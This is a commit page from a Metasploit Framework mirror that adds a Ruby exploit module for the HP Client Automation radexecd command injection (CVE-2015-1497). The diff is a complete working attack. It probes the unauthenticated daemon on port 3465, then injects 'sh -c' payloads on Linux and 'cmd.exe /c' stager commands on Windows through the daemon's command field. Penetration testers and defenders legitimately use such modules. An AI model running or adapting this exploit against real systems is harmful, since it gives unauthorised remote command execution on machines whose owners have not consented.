infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add module for ZDI-15-038, HPCA command injection

bug/bundler_fix
jvazquez-r7 2015-02-20 00:41:17 -06:00
parent 49f4b68671
commit b0c6671721
1 changed files with 126 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

126
modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb Normal file
View File

@ -0,0 +1,126 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Client Automation Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability on HP Client Automation, distributed
actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither.
This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
and CentOS 5.
},
'Author' =>
[
'Ben Turner', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2015-1497'],
['ZDI', '15-038'],
['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
],
'Privileged' => true,
'Platform' => %w{ unix win },
'DefaultOptions' =>
{
'WfsDelay' => 10
},
'Payload' => {'DisableNops' => true},
'Targets' =>
[
[ 'HP Client Automation 9.0.0 / Linux',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 466,
'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'openssl telnet generic gawk'
},
'BadChars' => "\x27"
}
}
],
[ 'HP Client Automation 9.0.0 / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))
register_options(
[
Opt::RPORT(3465)
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
deregister_options('CMDSTAGER::DECODER')
end
def check
connect
sock.put("\x00") # port
sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
sock.put("hide\x00") # command
data = sock.get_once
disconnect
if data && data.unpack('C')[0] == 0
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
case target['Platform']
when 'win'
print_status('Exploiting Windows target...')
execute_cmdstager({:flavor => :vbs, :linemax => 290, :delay => 0.75})
when 'unix'
print_status('Exploiting Linux target...')
exploit_unix
else
fail_with(Failure::NoTarget, 'Invalid target')
end
end
def exploit_unix
connect
sock.put("\x00") # port
sock.put("0\x00") # user ID
sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
disconnect
end
def execute_command(cmd, opts = {})
connect
sock.put("\x00") # port
sock.put("S-1-5-18\x00") # user ID
sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
disconnect
end
end